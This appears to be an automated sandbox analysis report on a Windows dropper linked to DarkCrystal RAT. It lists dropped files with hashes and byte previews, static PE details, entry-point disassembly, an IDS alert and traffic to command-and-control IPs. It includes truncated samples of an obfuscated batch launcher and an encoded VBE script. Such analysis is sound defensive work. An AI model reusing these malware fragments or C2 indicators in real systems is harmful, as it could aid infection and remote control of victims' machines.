                                                                                                                                                                                                  SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\unicodedata.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1096264
                                                                                                                                                                                                  Entropy (8bit):5.343512979675051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                  MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                  SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                  SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                  SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\fwJLoWFGhpY.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\1.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                                  Entropy (8bit):4.958784022195587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:WOS3mMuq7lArYAsQHT9Xz4ZCLMExn:7sIYAsST28LB
                                                                                                                                                                                                  MD5:5A4D5C42A21C0F7F61E44CC10B160A75
                                                                                                                                                                                                  SHA1:3924118492974AAA21D048FFB78E7EFBFC3F448D
                                                                                                                                                                                                  SHA-256:7D327844199CB637CA5B55C6818F8D1C9E259969DC0764CD5AD43D4FFEE2F97C
                                                                                                                                                                                                  SHA-512:DE82248B68361A7C0CC1F9A8B842905C6DD4D02429D7F387FD7032C874DE5B6760DE25C2919DBA14BEB4EBDF0D6D0C8A0B14882EA6006B776F0093DCB1DC4455
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:%IqxkBwRWQCiL%%jjSqKeRxrrEx%..%elHmjYD%"%SystemDrive%\Windows/Bridgeprovider.exe"%itjtkgnjQHSFE%

                                                                                                                                                                                                  C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\1.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):207
                                                                                                                                                                                                  Entropy (8bit):5.752747180497372
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GLwqK+NkLzWbHa/818nZNDd3RL1wQJR6CdkVOq7YOs:GiMCzWLaG4d3XBJbKVOj
                                                                                                                                                                                                  MD5:44D478A2A134EFF221F8607007B0BE7A
                                                                                                                                                                                                  SHA1:76A2838354EF1CA830DBF8EA4CDE03F27D0115DE
                                                                                                                                                                                                  SHA-256:E99A4322B12DA688C7130FB4F621E6AED22A0F9F62F2D01041F5796BF5D83B27
                                                                                                                                                                                                  SHA-512:6D738A4EF7F38A2A7969C26405E7BD0B6AE443AA8FC04E8A3ECC9C650E812097CFB888246E6E99FF464AD2E8C213A7A5873D6E7E9F6C37CB88B8E633F3B4C472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#@~^tgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&.bx[WS/&&6h9dG.wMtae 4mYr~~!S~6ls/.9TkAAA==^#~@.

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.999810867604253
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:IYXE4Uz61k.exe
                                                                                                                                                                                                  File size:50'529'184 bytes
                                                                                                                                                                                                  MD5:0c1cb4cc583aabc07f0482f7e0767ecf
                                                                                                                                                                                                  SHA1:2b1cc7fdfd2ec5668df1e1f0ff15153f70523e71
                                                                                                                                                                                                  SHA256:8ee6e8e2e26826c0d702f32e5cab8a3a551c6b92481b76d1b16b9e7fb3f62607
                                                                                                                                                                                                  SHA512:15ae49dedaa74c4a38cd597b7244214f59f7e09862ca1f7ed072fbe8c5a97cd4332c8e448b026e26c2dfdbd7b24d9be38d601a8c63c96046107a1262ee2249d2
                                                                                                                                                                                                  SSDEEP:1572864:s4oYmMGYcQP9UK7E3/rjmDHVZIU7oWJ5v:sRac6z70/H+XJ7ow
                                                                                                                                                                                                  TLSH:9FB73351DEDD7939C4262CBF1B423948C87CE46A2EACC81F77EE125097A1AD17F062E1
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:1515d4d4442f2d2d

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x41f530
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  call 00007FF1CCCBC5DBh
                                                                                                                                                                                                  jmp 00007FF1CCCBBEEDh
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                                  call 00007FF1CCCAED37h
                                                                                                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  call 00007FF1CCCBF37Fh
                                                                                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  je 00007FF1CCCBC07Ch
                                                                                                                                                                                                  push 0000000Ch
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  call 00007FF1CCCBB639h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  sub esp, 0Ch
                                                                                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                  call 00007FF1CCCAECB2h
                                                                                                                                                                                                  push 0043BEF0h
                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  call 00007FF1CCCBEE39h
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  sub esp, 0Ch
                                                                                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                  call 00007FF1CCCBBFF8h
                                                                                                                                                                                                  push 0043C0F4h
                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  call 00007FF1CCCBEE1Ch
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  jmp 00007FF1CCCC08B7h
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  push 00422900h
                                                                                                                                                                                                  push dword ptr fs:[00000000h]

                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xe050.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x233c.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .rsrc0x640000xe0500xe200d5ea19db2ac860286bc5d42e5dfbbd0aFalse0.6343853705752213data6.802173495258787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0x730000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                  PNG0x646440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                                                                                                                  PNG0x6518c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                                                                                                                  RT_ICON0x667380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                                                                                                                  RT_ICON0x66ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                                                                                                                  RT_ICON0x675480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                                                                                                                  RT_ICON0x683f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                                                                                                                  RT_ICON0x688580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                                                                                                                  RT_ICON0x699000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                                                                                                                  RT_ICON0x6bea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                                                                                                                  RT_DIALOG0x6fc1c0x2badata0.5286532951289399
                                                                                                                                                                                                  RT_DIALOG0x6fed80x13adata0.6560509554140127
                                                                                                                                                                                                  RT_DIALOG0x700140xf2data0.71900826446281
                                                                                                                                                                                                  RT_DIALOG0x701080x14adata0.6
                                                                                                                                                                                                  RT_DIALOG0x702540x314data0.47588832487309646
                                                                                                                                                                                                  RT_DIALOG0x705680x24adata0.6262798634812287
                                                                                                                                                                                                  RT_STRING0x707b40x1fcdata0.421259842519685
                                                                                                                                                                                                  RT_STRING0x709b00x246data0.41924398625429554
                                                                                                                                                                                                  RT_STRING0x70bf80x1a6data0.514218009478673
                                                                                                                                                                                                  RT_STRING0x70da00xdcdata0.65
                                                                                                                                                                                                  RT_STRING0x70e7c0x47cdata0.38414634146341464
                                                                                                                                                                                                  RT_STRING0x712f80x164data0.5056179775280899
                                                                                                                                                                                                  RT_STRING0x7145c0x110data0.5772058823529411
                                                                                                                                                                                                  RT_STRING0x7156c0x158data0.4563953488372093
                                                                                                                                                                                                  RT_STRING0x716c40xe8data0.5948275862068966
                                                                                                                                                                                                  RT_STRING0x717ac0xe6data0.5695652173913044
                                                                                                                                                                                                  RT_GROUP_ICON0x718940x68data0.7019230769230769
                                                                                                                                                                                                  RT_MANIFEST0x718fc0x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                  2024-12-08T23:02:43.286483+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449741193.32.162.6480TCP

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Dec 8, 2024 23:02:23.549576998 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:23.668939114 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:23.669038057 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:23.669248104 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:23.789186954 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.400887012 CET4973880192.168.2.445.137.64.40
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.520207882 CET804973845.137.64.40192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.520278931 CET4973880192.168.2.445.137.64.40
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.520373106 CET4973880192.168.2.445.137.64.40
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.639658928 CET804973845.137.64.40192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.071244955 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.165307999 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.769670963 CET804973845.137.64.40192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.769776106 CET4973880192.168.2.445.137.64.40
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.826915979 CET4973880192.168.2.445.137.64.40
                                                                                                                                                                                                  Dec 8, 2024 23:02:28.946234941 CET804973845.137.64.40192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:32.144444942 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:32.364562988 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.106367111 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.225692034 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.225769997 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.225963116 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.226022959 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.345380068 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.345391989 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.345463991 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.345530033 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.584167004 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.584227085 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.584276915 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.587244987 CET497398081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.587562084 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.706482887 CET808149739185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.706770897 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.706829071 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.708420992 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.708466053 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.827687979 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.827711105 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.827904940 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.827956915 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.064941883 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.065509081 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.065567970 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.065603971 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.065646887 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.069319010 CET497408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.188587904 CET808149740185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.134459019 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.254020929 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.254090071 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.254406929 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.373687029 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.373745918 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.493082047 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.728347063 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.728748083 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.728840113 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.728903055 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.732389927 CET497428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.851667881 CET808149742185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:47.152484894 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:47.348989010 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.340903997 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.460206032 CET808149744185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.460287094 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.474147081 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.593535900 CET808149744185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.593583107 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.712961912 CET808149744185.17.0.139192.168.2.4
